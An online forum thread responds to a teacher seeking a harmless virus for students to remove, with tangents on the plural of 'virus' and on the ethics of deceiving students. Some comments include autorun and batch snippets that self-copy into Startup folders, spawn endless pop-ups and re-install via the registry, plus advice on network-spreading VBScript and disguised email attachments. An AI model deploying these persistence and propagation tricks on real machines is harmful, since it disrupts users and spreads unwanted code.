Are you kidding? Stoned is nasty. "Not particularly malicious"? You call corrupting the partition table not malicious? Back in 1994 our college computers were plagued with it. I had personal experience with it and as the lab technician for the LAN class I was tasked with scanning and cleaning every damned floppy the class had.

If you want a simple and easy "virus" write a quick word macro virus.

Fake it.

[blair1q]

Virii all have different signatures, so it doesn't matter what signature you choose.

Just write a script that pokes something into the registry and adds a funny file to the Windows system directory, and use it on each computer before class.

Then write a script that pretends to find it and tell them where it is when they run it in class.

Ask them what they should do next.

Re:Fake it.

[Missing.Matter]

The plural of virus is viruses. Just like the plural of abacus is abacuses, not abacai. Viri (or even worse, virii) annoys the hell out of me.

Re:Fake it.

[blair1q]

Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water". Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs". The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states, but I'm pretty sure nobody much thinks of it that clearly when using the word "virus". Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) but only to an instance of that type of virus as it is spreading, or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

As for whether it annoys you for people to use a latinate word that is both convenient and apt despite its not being precisely Latin, well, tough titty, because apparently the Latin version of it is a mispronunciation of the Proto-Indo-European word for the same gooey mess, so insisting on going only as far back as Latin for the value of correctness of form is false cognitive closure, and that gives everyone else cause to be annoyed at you.

Re:Fake it.

Oh, stop being a crybabii

Re:Fake it.

[Barny]

If I only had mod points...

Not only did you school him in language, but you did it for Latin. +2 internet points sir

As for the grand-parent, sure its Latin roots are interesting (as the parent shows) but with English, all words are subject to change without notice, otherwise we would not have such cromulent words as D'oh and Embiggen.

Re:Fake it.

[godrik]

hat off.

PS: I frequently use scenarii which, I learnt recently, should not be used in english.

Re:Fake it.

scenarii is not correct Italian either (just as virii is not correct Latin or English, which is why the earlier poster said it annoyed him)

For the record, it is scenarios in English and scenari in Italian, and viruses in English, and no known plural at all in Latin (but even if it had one, it would NOT have been virii).

Re:Fake it.

Kudos.

Re:Fake it.

[Internalist]

+5, Informative?...REALLY?!?...

OK, let's start with a handily recent post on the Language Log about Latin plurals (the post is about "syllabus", but "virus/viruses/*viri/**virii" show up in the comments).

Now, onward...

Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water".

Actually (and ignoring the somewhat startling categorisation of computer virus as "substance"), not in the same way at all. You can't call a single molecule of water "a water" because "water" is a mass noun in English, and those don't (i) take indefinite articles, and (ii) don't pluralize nicely (inter alia). It's possible that this portion of your argument comes from here, which points out that in Latin, "virus" ("poison") was a mass noun. Of course, in English, "virus" is very clearly a count noun in English, since it can be (and overwhelmingly is) used with an indefinite article.

Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs".

You appear in the preceding to be claiming that the word "virus" doesn't exist in English (or perhaps simply that is has no referent) a claim some information security researchers (and doctors!) might take issue with (cue lambasting for the stranded preposition in 3...2..1).

That being said, this raises an interesting point about...something. Maybe the type/token distinction? When someone says "I wrote a virus", we take him (or her, I suppose) to be making a claim about an implementation of some specific algorithm in some specific language, but not to any particular token of it.

The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, [...]

I don't understand the grounds on which you're making this claim.

[...] which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states,

OK, so the "running program, and its data" counts pretty much as a "single token of the substance" at hand, in my book. So now it sounds like you're contradicting your opening claim.

but I'm pretty sure nobody much thinks of it that clearly when using the word "virus".

As I just mentioned, you seem to be contradicting yourself (although I may just be misreading you), so you'll forgive if I take claims of clear thinking only quasi-seriously.

Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) [...]

Why is this 'incorrect'? "I wrote a virus. I'm calling it Johnny5." Seems like a perfectly good use of "a virus" to me.

[...] but only to an instance of that type of virus as it is spreading, [...]

Again, isn't this in contradiction to how you started this comment?

or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

Aside from the impossibility of "some arbitrary subset" of an instance (I'll assume that was just a typo/thinko), now you're just engaged in verbal wankery. I mean, I suppose you might choose to model the spread of contagion in a network of computers as the flow of a kind of flu

Re:Fake it.

What a clever response. Unfortunately (for you), you're still a pretentious knob.

Re:Fake it.

yay for linguists! ^_^

Re:Fake it.

Thanks, Man! Abacai sounds like a great D&D name!

Re:Fake it.

So where, in this bundle of bullshit, is your admission that virii is just embarrassingly wrong on so many levels?

Re:Fake it.

[Combatso]

They are both examples of Pretentious knobii

Re:Fake it.

Hah.... You got +4!

Re:Fake it.

You both fail RFC1122:1.2.2

Re:Fake it.

[blair1q]

Simply put there was no PIE to be "mispronounced" when there were Latin speakers.

And there is no Latin any longer, as any Latin professor will tell you when informing you that there should be no accent whatsoever on the language when spoken by a native English speaker, because that is the only equitable way to deal with the fact that we have no way of knowing what the accent would have been.

As for the "subset of an instance" part, an instance of water is an ocean. A subset of an ocean is a sea. A subset of a sea is a droplet. And so on.

And, essentially, the point kinda sorta whooshed over your head. In English the word "virus" is not used the same way it should be in Latin, so there's no basis for complaining that its plural is not correct Latin. As you point out, it's an English word now, and we're keepin' it.

Re:Fake it.

[blair1q]

I believe that's Knobii Pretentiensis.

Re:Fake it.

[blair1q]

yay for cunning linguists! ^_^

FTFY.

Re:Fake it.

[blair1q]

It's nowhere because it's not.

English is an agglomeration of many languages, so how it chooses to apply rules from those languages is necessarily in violation of them all, nearly all the time.

What's embarassing is that there are now about 100,000 virii that have to be tracked, quarantined, and removed from systems daily, and someone thinks the words used to describe it are what's worth getting upset over.

Re:Fake it.

[Combatso]

ahh yes, its been a while since my Douchebaggery in the 21st Century social science class..

Re:Fake it.

[Bobb+Sledd]

Oh shut up already. We don't give a crap about your Latin skills. My dictionary says:

World English Dictionary
virus (vars)

— n , pl -ruses

http://dictionary.reference.com/browse/virus

Re:Fake it.

[blair1q]

Dictionaries are descriptive, not prescriptive. If your dictionary doesn't tell you what "virii" means, then your dictionary is incomplete.

Re:Fake it.

[Bobb+Sledd]

My dictionary has cactus and cacti. It has syllabus, syllabuses and syllabi. It has virus, and viruses. But no virii.

If none of my dictionaries have the word "virii" it means it doesn't exist and you made it up. So if you want it to be a real word, then go write Merriam Webster and ask them to add it.

Otherwise, I suggest you make a citation to one (and the Urban Dictionary doesn't count).

Re:Fake it.

[Bobb+Sledd]

Actually, I take it back: I think I will let you quote the Urban Dictionary:

1. virii

buy virii mugs, tshirts and magnets
Virii is in fact an INCORRECT pluralization of "virus", however, some retard keeps resubmitting it as the plural form.

Re:Fake it.

I'll have a water and she'll have a coffee.

See ... you can say "a water" just fine.

Re:Fake it.

[Lanteran]

You sir, have been promoted to grammar Hitler.

Re:Fake it.

[blair1q]

You don't have enough dictionaries, causing you to suffer from false cognitive closure as well.

http://www.wordnik.com/words/virii

In Latin, "virus" has no plural, the way in English "water" has no plural. It's uncountable.

In English, however, "virus" applies to things that aren't amorphous gooey substance, but are instead computer programs.

Once you've broken one rule by making an uncountable noun refer to a countable thing, there's no reason not to use it to refer to multiple countable things by breaking another rule.

I.e., if the Romans had had computers, and used "virus" to refer to a computer program, they could easily have used "virii" to refer to multiple such computer programs, but they wouldn't for any reason have used "viruses", and probably would have flung you from the Tarpeian Rock for trying to give them a reason.

Re:Fake it.

[Internalist]

Um...thanks?

Re:Fake it.

[Internalist]

This probably should have been modded higher; it's an astute observation. You can, indeed, say "a water", but pretty much only in the context you've highlighted here, you're actually using some kind of elliptical form to say "a [vessel filled with] water", i.e. you're effectively saying something other than what we're discussing above.

Re:Fake it.

[thePowerOfGrayskull]

http://xkcd.com/386/

Re:Fake it.

[Bobb+Sledd]

You're clearly an idiot.

Wordnik.com (that you linked to) shows a single dictionary that has that as a definition: Wiktionary. Ooooh, credible.

Re:Fake it.

[Slayer+Silver+Wolf]

What’s really funny is that of all the posts replying to this one not one of you have actually gotten the correct spelling of the plural if you knew your English properly you would realise that plurals of words in the English language that end with a s do not get es added to the end but rather an apostrophe therefore the correct plural of virus is virus'.

DON'T DO IT! You'll get fired

[CPE1704TKS]

It sounds instructive, but you will probably get fired for lacking good judgement.

There are plenty of stories where teachers do similar things that end up getting them fired. Teaching students how to write viruses, faking a classroom kidnapping, how to plan a terrorist attack, etc.

Teaching your students how to write a virus is a classic case of bad judgement. Your superiors will tell you "What were you thinking?" and you will get let go.

Teach them verbally how viruses are created, but don't assign anything as homework.

Two testing options and a removal tool

There are a couple testing files and sites that exist for testing antiviruses that might be of interest. The one that I've used to ensure anti-virus software was functioning was EICAR which is a simple text file that virus definitions recognize but which does not actively do anything. This is useful for demonstrating that software is working, what a virus response looks like and how to remove a virus if it is found. Since it does nothing, it is only useful as a test and doesn't really get into how to deal with a fully compromised system.

An alternative is Spycar which will perform actions targeted in demonstrating browser exploits. It wouldn't be available in a non-internet lab, but you might be able to adapt the links there by putting the files up on an intranet.

http://www.spycar.org/Spycar.html referenced at http://www.pcworld.com/article/125138/put_your_antispyware_apps_to_the_test.html

http://www.eicar.org/anti_virus_test_file.htm referenced in a variety of places, including http://www.sophos.com/pressoffice/news/articles/2003/01/eicar.html

Removal scenarios vary according to how messed up a machine is by an infection. I usually use Trinity Rescue Kit as a first test for computers I don't trust or know have virus issues.

TRK: http://trinityhome.org/

I use MalwareBytes from http://www.malwarebytes.org/ in some cases and found it to be more effective than many of the other solutions, even in the free version.

AOL 3.0

[stevedmc]

F-Prot used to detect AOL as a virus. Install an older version of AOL such as AOL 3.0 and see your students can remove it.

Re:AOL 3.0

[lennier1]

To be fair, it was annoying and could cause problems with the system. ;)

Stuxnet

It certainly needs some demystification!

Go fish...

[clone53421]

Just pick any of the scores of .exe files masquerading as cracks on LimeWire. You’ll have to turn off the AV and executable file filter to download it, of course...

Re:Go fish...

[phyrexianshaw.ca]

You’ll have to turn off the AV and executable file filter to download it, of course...

turn off... the... what..? am I the only person in the world these days that doesn't run AV on personal PC's? jebus, I wouldn't even know what to buy anymore.

Re:Go fish...

[clone53421]

jebus, I wouldn't even know what to buy anymore.

Well, that’s easy, at least. ESET NOD32.

Re:Go fish...

[AltairDusk]

I would personally recommend Avast! or Avira Antivir. Both have free versions that work well. (Antivir scored better in the AV-comparatives tests but it does pop up a window with a link to buy the pro version after it downloads updates once per day).

Re:Go fish...

I recommend Antivirus 2010. Now that one catches viruses I didn't even know existed!

Re:Simple

hurrr durrr ur hilerius

Good times

[gmuslera]

No matter how safe is the OS they are using, or what antivirus they have to run there, the biggest risk is on the other side of the keyboard. Show them the Good Times "virus", a bit of social engineering is easier to be seen than abstract code.

Re:Good times

agreed

do it wrong, do it in VBScript

I'm going to assume you are using Windows, because the only classes that use Macs to teach are Art and OA. (FLAME ON! ;D)

Step 1. Make sure the lab you are going to infect with anything that self replicates is logically isolated from the rest of the world. I mean, punching out a self replicating VB script is fun when it goes to plan, less fun when the Feds knock on your door after your 'virus' accidently breaks loose...

Step 2. Learn yourself some VB Script. Piss easy to use. It'll take a few hours for you to knock up a script that is capable of copying itself to the "c$" on all the Windows machines on the subnet, then kick up the script remotely using WMI (providing the users have administrative access to all machines). http://gallery.technet.microsoft.com/ScriptCenter/en-us

Step 3. Make sure you get written permission from your supervisor to do this kind of thing. The last thing you need is a cranky boss coming down on your for 'teaching people about the virus, when you are supposed to be teaching them about the email!!"

Tips: Create a routine in your code that checks for "c:\stop.txt" or somesuch and kills itself if it finds it (we've got SkyNet by the balls now!). Use the "WScript.Sleep TIME_IN_MILLISECONDS" command so that your network isnt completely screwed over by all the traffic you are about to generate. Outside of this, get creative. Enjoy.

Re:do it wrong, do it in VBScript

[Hegh]

If you write your own, you may not want to include propagation beyond any single machine. No risk of getting out that way. Just make it tricky for a user to remove, to show the various techniques that may be needed (hiding in multiple places, being started from registry keys and other locations, running multiple processes that each monitor the others so it's tough to kill them all, ...). Good luck, and ask for permission before doing it!

Simple...

Watch porn on your windows laptop -> connect laptop to network -> ??? -> Sucess

There's virus source out there. Be careful.

[bersl2]

Obviously, you should know exactly what it is that the virus is doing. No, not approximately: I mean all the way down to the machine instruction level. If it comes only in a binary, disassemble and figure out everything. Use virtual machines to add a layer of protection, and be aware that some malware knows it's being run in a VM and may behave differently under these conditions. Of course, those are much more than you need.

The safest bet is to write your own. That way, you know what it's doing.

Re:There's virus source out there. Be careful.

[TheDarkMaster]

I agree. The author of TFA can research about writing on Windows services, boot blocks, etc, and write your own (and funny) virus to get some fun for yours students. I as example write some time ago a very funny and simple program with just one function: Draw random icons in a non-stop fashion on the "main window" of Windows (acessible by windows API, the window id where all windows are draw). Is funny trying to stop this when your desktop is flooded with cute icons and any program you try to open is flooded too :)

If you have to ask...

[vipvop]

First of all, EICAR isn't helpful at all, it's simply a magic string that AV software is supposed to pick up. It won't teach anyone anything about how a virus actually works.

Second, if you have to ask /. about this, you probably shouldn't be playing with these things. There are a million virus writing guides out there, a simple search turns up pages like this:

http://vx.netlux.org/lib/static/vdat/tutorial.htm

Most of these tutorials were written a long time ago, with topics such as infecting .com files (not that anyone remembers what those are anymore). If you want a simple overwriting virus, that isn't hard to find examples of or make at all. Howeverm there won't be a way for the students to clean the infected files, as the information in the beginning of the file will have been lost. If you want something that infects .EXEs while still letting them run without problems, you're going to end up with complicated code that adds sections onto an executable, modifies the EXE header, etc. While none of this is too hard to understand if you have programming ability and time to sit there and look at how it works, what you're looking for won't exist at a Computers 101 level.

Re:If you have to ask...

[X0563511]

... which is fine, because he's not teaching them how to write a virus, but how to recognize and respond to an infection!

Lots of words put down, when you didn't properly read the post. At least you noticed EICAR wasn't suitable :)

Re:If you have to ask...

[vipvop]

Remove by hand to me means manually disinfecting a non-overwriting virus. It's not that hard to do if you can follow assembly language, have a knowledge of the executable's format, and know a bit about how a virus works. For your average virus of the 90s, simply changing the program's entry point back to the original location was sufficient to disinfect a file, and it was easy to find this location as the virus always stores it (at least if the program's still going to run).

In retrospect he probably meant how to use some kind of AV software, but to me that's removing with the use of software, not by hand.

Re:If you have to ask...

[X0563511]

My impression was something more along the lines of booting into safe mode and removing a worm (that was otherwise non-destructive - like that one that caused RPC to die a while back?).

I've had to do that once. Nobody had a fix out yet, and I managed to nail the thing into place long enough to kill it from a foreign system. It was a learning experience :)

I would Recommend

Stuxnet seems to be popular. And if any of the students have nuclear ambitions it'll soon put an end to that.

Try stuxnet

[velja27]

Try getting yourself one of those stuxnet worms, i hear they are pretty good.

Re:DON'T DO IT! You'll get fired

Mod parent up. It may be cool and the kids will love you for it, but when push comes to shove, the cow pies will hit the fan.

Re:DON'T DO IT! You'll get fired

[jmottram08]

No where was it mentioned about creating one. Ever. It was mentioned about how to REMOVE one, and to illustrate how they spread.

It wasn't even mentioned that this is a coding class.

It is a class about computers, and he wants to teach virus removal.

Stop being such a lawyer and actually read the summary ffs.

Re:DON'T DO IT! You'll get fired

[Keith111]

Heh this is probably correct... Best would be to go get some virus CODE and display it on a screen and step through how it hooks itself into a system. A great thing to use here is the 0ldschool types that would infect the exe headers and plant itself at the end. Or some that do the code cave storage. Then move from there and show them rootkits, as they are pretty much just a way more advanced version of those. Plenty of resources online for that. One particular book that is somewhat old now but still really informative http://www.amazon.com/Rootkits-Subverting-Windows-Greg-Hoglund/dp/0321294319

Re:DON'T DO IT! You'll get fired

[WitnessForTheOffense]

RTFA again. He said he would install it and they would remove it. While your point about how doing this could possibly get him fired still stands, he's talking about only having the students remove it.

Write Your Own

[PiAndWhippedCream]

Just code your own virus. You'll know how to remove it. Alternatively, if you are teaching an advanced class as well, have those students write it.

Re:DON'T DO IT! You'll get fired

[Tripp-phpBB]

He asked for a simple virus the students can remove by hand, not how to create them. I think the point he's trying to make is using a computer safely and if you do get a virus, what to do and how to remove it. I suppose the reason he asked to compile it is so he can see the source code? Or maybe I'm just an insensitive clod!

A WONDERFUL teaching tool - master Michelangelo!

[Auroch]

Something oldschool. So even when administration DOES try to fire you, you can say "REALLY? Over a virus that infects floppies, on a network that doesn't have a single floppy drive installed?". Just don't do it on the first week of May.

Pascal virus

[bigato]

Here: http://members.rediff.com/eggo/viruspascal.htm This is a really simple virus that you could use. Sorry the page is in portuguese, but the code itself is easy to understand.

Re:DON'T DO IT! You'll get fired

[Missing.Matter]

At my university, we have a computer security lab just for this purpose. It's completely isolated from the internet and the campus network, with all computers, servers, switches, etc. available for student access.

As with all dangerous things, the key is to make everyone aware of the dangers and the consequences, and then closely supervise them. A lab course I took actually required us to use plutonium for neutron activation. As far as dangerous things go, that's on the top of the list. But we wore film badges and were supervised, and everything turned out okay.

Try this instead.

[neiras]

What do you expect a student to learn from being told "there is a virus on this machine, remove it by hand"?

If they are in the "demystifying the black box" phase, they have no idea what you're talking about.

Teach them that viruses are just programs like Word or Excel, except with a specific malicious purpose. Give them an overview of how a machine or user might be tricked into running malicious software. Teach them about how malicious software might propagate. Use historical examples. Talk about privileges.

Virus is a slang term that brings up all kinds of scare reactions in ordinary people. They immediately assume that machines are vulnerable to bacteria floating around on the wind, or something similar. You need to de-emphasize the term "virus". It's just software. Then teach them that 99% of all malicious software runs on Windows, and that it's a reflection of the number of vulnerabilities in Windows code and market share.

Write a simple program that copies itself to the Windows folder and starts itself at boot. The program should show an alert box saying "HACKED BY PROFESSOR HANDSOME!!!!" if it sees it is being run from the Windows folder. Put it on a USB key with an autorun.ini, tell them you have placed a virus you wrote on there, and let them sort it out. Just be sure you're on an XP machine and that autorun is enabled.

Better yet, email the .exe to the entire class. Call it CS101-Example.exe, and use the harmless infection to talk about social engineering. Then take them through the 'infection' process, and show them how to remove the file by hand.

Re:Try this instead.

[trampel]

Somebody please mod parent up!

Re:Try this instead.

[Barny]

Yeah, about writing a small virus, you do know that a lot of the early virus were written without thought to their global spread (best example is the morris worm), and that if your particular one gets out, no matter how innocent, it will be a federal felony to have done that? Worth your job? No.

Best bet would be for the parent to officially contact an AV company and ask them, they will be able to give professional advice and possibly even live code (but I doubt that, would likely need to go looking for one you want to use) and you will have plausible deniability because you sought "professional advice" from a "known industry leader".

Re:Try this instead.

[rochberg]

Then teach them that 99% of all malicious software runs on Windows, and that it's a reflection of the number of vulnerabilities in Windows code and market share.

Market share, yes. Vulnerabilities in Windows code...eh, not so much any more. It may not be the most popular thing to say around these parts, but MS has made great strides in adopting and pushing secure coding techniques. These days, the most culpable are third-party developers, especially device drivers. Sure, you can argue that Windows' access control policies allow it, but that's not what you said above. But I'm just being nitpicky.

Better yet, email the .exe to the entire class. Call it CS101-Example.exe, and use the harmless infection to talk about social engineering. Then take them through the 'infection' process, and show them how to remove the file by hand.

Are you insane?!? Absolutely DO NOT DO THIS!!

I remember a few years ago when researchers at Indiana University conducted a study on phishing. Basically, they set up a web site and lured students to enter their credentials. The s*** storm that erupted was immediate and furious. The only thing that saved these researchers' jobs was that they had worked very closely with the school's Institutional Review Board (IRB) to make sure that they were adequately ensuring (among other things) respect for persons. Deception is inherently disrespectful, even if it is done with good intentions.

What may seem like a "harmless infection" to you demeans the students, because you're encouraging the instructor to abuse the trust that their students have placed in him. In short, what you are proposing causes harm to the teaching profession.

Re:Try this instead.

[neiras]

Better yet, email the .exe to the entire class.

Are you insane?!? Absolutely DO NOT DO THIS!!

The gap between my suggestion and what those researchers did is pretty wide. My idea:

  o Doesn't involve bilking people out of their private credentials;
  o Would be limited to a class studying malicious software (how's that for an appropriate context)
  o Involves a known-harmless teaching payload;
  o Would be fully understood and removed by students at the end of the class.

Deception is inherently disrespectful, even if it is done with good intentions.

What may seem like a "harmless infection" to you demeans the students, because you're encouraging the instructor to abuse the trust that their students have placed in him. In short, what you are proposing causes harm to the teaching profession.

I have a hard time understanding why any real teacher in this fellow's position would abstain from imparting one of the most critical lessons a student can learn about security: that they themselves are the weakest link, no matter how smart and prepared they think they are, and no matter how much theory they can regurgitate at paper time.

The burned hand teaches best, and understanding how and why you were burned is priceless.

It's disrespectful, and even a little condescending, to 'protect' students from real lessons. Are we preparing them for the real world or not? And are students so fragile that they would run to the Dean's office to complain to about the teacher after such a simple and well-explained exercise?

Re:Try this instead.

[Sparx139]

It's an isolated network. But, assuming that you knew that and mean if it wasn't properly cleaned, or managed to escape by some other method, it just requires some planning beforehand. Write conditions in so that it will only activate at a certain date (so after a few days it's benign). Or conversely, if the system clock doesn't match the date, then it deletes itself.
It just means that safeguards need to be placed.

Re:Try this instead.

[kklein]

I haven't seen mod points in a very long time (part of why I stopped reading Slashdot almost entirely, if anyone cares), but as a teacher (linguistics, actually), this is how you handle something. It is cute, it is instructive, and it is likely to stay in their memories for a long time.

If you're not teaching, you should be (although it's hard to find well-paying work--but if you do, you hang on like grim death).

Re:Try this instead.

Or with windows habit of hiding the extension, call it Call it CS101-Example.doc.exe

Re:Try this instead.

[pla]

What may seem like a "harmless infection" to you demeans the students

Oh, gimme a frickin' break. The sooner the precious little froshie lardflakes learn not to click every attachment from a seemingly trusted source, the better.

"Demean"? Yeah, doing something stupid makes you feel stupid. Doing it twice proves it. Hopefully most of them won't do it when he pulls the same trick as part of the final.


Of course, in practice, you speak 100% the truth. God forbid we make someone feel bad as a learning experience, the lawyers would descend like... Well, like lawyers.

Re:Try this instead.

[neiras]

If you're not teaching, you should be (although it's hard to find well-paying work--but if you do, you hang on like grim death).

You just made my day. Thanks for the encouragement.

Re:Try this instead.

[mcgrew]

Teach them that viruses are just programs like Word or Excel, except with a specific malicious purpose.

It doesn't have to have a malicious purpose to be a virus, and it doesn't have to be a virus to be malware.

Give them an overview of how a machine or user might be tricked into running malicious software.

That's a trojan, not a virus.

Virus is a slang term that brings up all kinds of scare reactions in ordinary people.

No, it's not slang at all. It was called a "virus" because like a biological virus, it's tiny and self-replicating. If it can't replicate, it's not a virus. And if there's anybody in class that believes "vulnerable to bacteria floating around on the wind" they're in the wrong class (and BTW, bacteria and bioligical viruses are completely different animals).

Then teach them that 99% of all malicious software runs on Windows

100% of all VIRUSES run on windows, although your 99% is likely correct about malware in general.

Call it CS101-Example.exe, and use the harmless infection to talk about social engineering.

Again, if it needs social engineering it is NOT necessarily a virus. If it needs social engineering it's a trojan. If it can propagate across a network without human intervention it's a worm. Some malware can have elements of viruses, trojans, and worms, but the terms have specific meanings. If he's teaching about malware he should be teaching the differences between the different kinds of malware. There are quite a few excellent books on the subject.

Re:Try this instead.

[rochberg]

Better yet, email the .exe to the entire class.

Are you insane?!? Absolutely DO NOT DO THIS!!

The gap between my suggestion and what those researchers did is pretty wide. My idea:

o Doesn't involve bilking people out of their private credentials; o Would be limited to a class studying malicious software (how's that for an appropriate context) o Involves a known-harmless teaching payload; o Would be fully understood and removed by students at the end of the class.

Actually, it's not as wide as you think. The researchers did not collect any of the personal data. They simply provided a message that this could have been a scam. So the "payload" there was also harmless. The outrage wasn't about any stolen data. The outrage was completely about the deception. Even after the administration placated fears that the students had about identity theft, the uproar continued. Also, the class isn't focused on malicious software. That's just the topic of this lesson. The class is a 101 introduction to computing. If this were a more advanced class...maybe...given the circumstances. But this is absolutely not the right audience for this kind of lesson.

As for the harmless payload, how does the student know that? All the student sees is that they clicked on something and the teacher infected their computer. Sure, during the lesson, you point out how to delete the file. But how does the student know that was the only file you installed? You could have embedded a keylogging rootkit within that virus for all they know. By falling for your trick, they lose a little bit of trust in you. As a result, some of them (especially those who are not doing well and think it's because you "have it out for them") will remain suspicious and think that you've planted something nefarious on their computer. Without that trust, you can't convince them otherwise.

As for the lesson being "fully understood [...] at the end of the class," that's just wishful thinking. After all these years, everyone now knows not to click on email attachments, right? Apparently not. I remember reading some commentary once (I think it was Adam Shostack) that pointed out that user education doesn't work. Many, many people who have undergone security training get phished, install viruses, etc. Why is phishing still a problem? Because it works. Social engineering is effective. All you have to do is surround that link with some text about getting rich fast, seeing celebrity X naked, losing 50 pounds in a week, etc., and you will get some hits. Even from people who have been trained to know better.

Most likely, some of these students will (in the short term) not click on anything they get via email, even if it's legitimate. After a while, though, the lesson will fade, they'll become complacent, start clicking on things...and we're back at square one. Many of the students will still click on attachments, thinking they're safe. After all, this attachment isn't called "CS101-Example.exe" so it must be safe, right? "What do you mean I got a virus? All I did was open this .doc file. It wasn't a .exe!"

Deception is inherently disrespectful, even if it is done with good intentions.

What may seem like a "harmless infection" to you demeans the students, because you're encouraging the instructor to abuse the trust that their students have placed in him. In short, what you are proposing causes harm to the teaching profession.

I have a hard time understanding why any real teacher in this fellow's position would abstain from imparting one of the most critical lessons a student can learn about security: that they themselves are the weakest link, no matter how smart and prepared they think they are, and no matter how much theory they c

Re:Try this instead.

[rochberg]

Oh, gimme a frickin' break. The sooner the precious little froshie lardflakes learn not to click every attachment from a seemingly trusted source, the better.

See my response above. Assuming that they will actually learn the lesson here requires a big leap of faith (and naivete and a lack of experience studying how well "user education" solves security problems).

God forbid we make someone feel bad as a learning experience, the lawyers would descend like... Well, like lawyers.

Again, making students feel bad is not an effective teaching technique. It may work on some, but it will completely backfire on others and you've completely lost them for good. And you don't really have to worry about the lawyers as much as the parents. Yes, the parents. Even in college.

Re:Try this instead.

As a student... I wouldn't like that kind of trick pulled on me. But I think it would probably be a decent lesson, It's not at all damaging to anything but one's ego.

Write your own?

[rwa2]

It's Windows, so it's easy... just create a CD or USB drive with two files:

autorun.inf :
[autorun]
            open=installpopup.bat

installpopup.bat :
cmd.exe /k echo "Hi I am a virus"
copy installpopup.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Bonus is that it has plenty of legitimate uses for system automation for your little script kiddies as well.

Re:Write your own?

[poor_boi]

Instead of

"C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Use

"%ALLUSERSPROFILE%\Start Menu\Programs\Startup"

or to avoid Vista/W7 UAC issues:

"%USERPROFILE%\Start Menu\Programs\Startup"

Re:Write your own?

This.

Installing an actual real virus on your network, closed or not, does not seem like a good idea to me.

Re:Write your own?

[AlexiaDeath]

IMHO a really good example on how viruses spread. It's simple and clearly takes the magic away. It has all the right elements.

Re:Write your own?

[Nesman64]

I think rwa2's example is perfect, but if you want to expand the lesson, put a second copy (with slightly different message) in a file called DancingBunnies!.bat

This will help to explain another common method for viruses to spread.

Re:DON'T DO IT! You'll get fired

[vxice]

actually in the article he makes it clear he wants to infect a computer to show students how to remove it. Still is risking it, especially since it is normally a simple procedure to remove a virus with an anti virus program.

Are you looking for an open source virus

[zlel]

or must it be GPL?

Batch hell

[William+(Dthdealer)]

My favourite batch file. It is a shame Windoze does not support a proper POSIX language, but only this crappy DOS batch stuff. AFAIK this script does not work on vista, but works on Windows 7 and XP.

:START
msg %username% Memory exception at 0x%RANDOM%
goto START

It loops, layering more and more pop-ups the longer it runs. As soon as one is closed or 60 seconds elapses another appears in the centre of the screen, de-focusing whatever the user was typing in or doing. Put it in allusers/startmenu/startup.

Now write a second batch file and hide it somewhere along with another copy of the above. It should check IF FILE EXIST for the above script, and if it does not exist then copy the above script back to the 'startup' directory. Make this IF FILE EXIST batch file execute on start-up via registry.

The benefits are that nothing harmful is done and other processes are piggybacked for the operation ( I believe explorer.exe perhaps stores the popup queue? ), so you won't spot anything out of the ordinary in taskmanager

Fixing can be done by simply deleting the files ( if the kids can find where they are located ).

AFAIK The pop-ups survive even into the login prompt if the user logs out.

We did the same thing in health class

We did the same thing in health class. The first part of the tutorial was really fun, the latter part not so much.

Wrong class Should be a Graduate Studies Class

This is the wrong class to show this type of Malware.

If this is a 101 class in Computers and in particular Computer Security, you would be better to teach Hardening of Systems.
Discuss what Malware is and the different types of Malware.

Reason is the students need to have an understanding of Operating Systems and Applications to do anything in this area.

If you are still interested then search on "Virus and University of Calgary" on what are the issues.

Better to focus on Back doors and Netcat being the tool. Much better then a Virus do to their nature to leave the computer lab.

   

Just write a program.

[sumdumass]

You are most likely going to be better off to just write a program or script that makes a few files called "lookatme" along with a few registry entries and have them remove that.

Most virus' that you will find will tip the AV software. Almost all easy virus' will be automatically removed by it too. If you are not running some AV software, then your in a little trouble to begin with as you shouldn't be teaching people to run windows boxen without AV software.. Sure, you could probably set the AV software to ignore the file itself, but it likely wouldn't ignore the execution if it wasn't a strait up program that just wrote files (memory injection and process hiding techniques will most likely cause issues as most AV clients nowadays rely more on heuristics then actual signatures).

If I was you, I would write a script that makes a text file in the windows directory, the system directory, temp directory and maybe adds a few registry entries in the run portions of the registry. Perhaps one of the text files could read something like- "you have been pawned by the elite text virus" or something and have it open on start up. Perhaps put it on every other computer and have them search for how to remove it on the one next to them while working in pairs. Make a simple instruction on how to remove it by looking in the appropriate start up areas, looking in the common file target areas, and then finally by downloading a reverse script and running it that removes all traces of it.

Oh yea, surf for porn/ something as shady on each computer before you load the fake virus so part of the removal.disinfection process can be getting freely available tools like Adaware or malwarebytes and so on and it will find something to remove. If they aren't connected to the internet, then make sure the free tools are something that doesn't need an internet connection to download. You might also want to remove the AV software and have them simulate installing it afterward to ensure/instill that there should be some level of protection at all times.

Re:How about...

[X0563511]

Er, did you even read the damn post?

Here, let me help you out with the first four fucking words:

Currently I am teaching...

Re:Simple

[Speeddymon]

Someone that is asking a question such as the OP isn't going to know what a distro is dude, you have to break it down for them. Regardless, your post wasn't even remotely funny. It was redundant and boring, the kind of thing that a 13 year old posts these days.

Re:DON'T DO IT! You'll get fired

[X0563511]

He's not asking how to teach them to write a virus...

Please (re?)read the post...

Why not a live virus?

[AgentPhunk]

